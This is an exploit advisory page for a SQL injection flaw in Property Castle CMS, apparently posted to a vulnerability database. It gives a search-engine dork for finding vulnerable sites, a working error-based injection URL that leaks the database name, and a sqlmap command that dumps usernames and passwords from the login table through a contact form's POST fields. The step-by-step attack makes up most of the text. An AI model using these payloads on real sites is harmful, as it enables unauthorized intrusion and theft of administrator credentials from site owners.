Property Castle CMS post SQL injection

2015.10.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Property Castle CMS post SQL injection # Google Dork: inurl:"/cms/cms.php?link_id=" # Date: 05/10/2015 # Exploit Author: Timoumi Houcem # Tested on: kali linux on iceweasel browser # EXPLOIT 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+ we will have database name 2- we search "contact us" page 3- we use "http header" to get data names (all post data are injectable , i will use the first in this example) 4- we use sqlmap tool now and inject it with POST method EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ] #admin page: http://website/admin/index.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top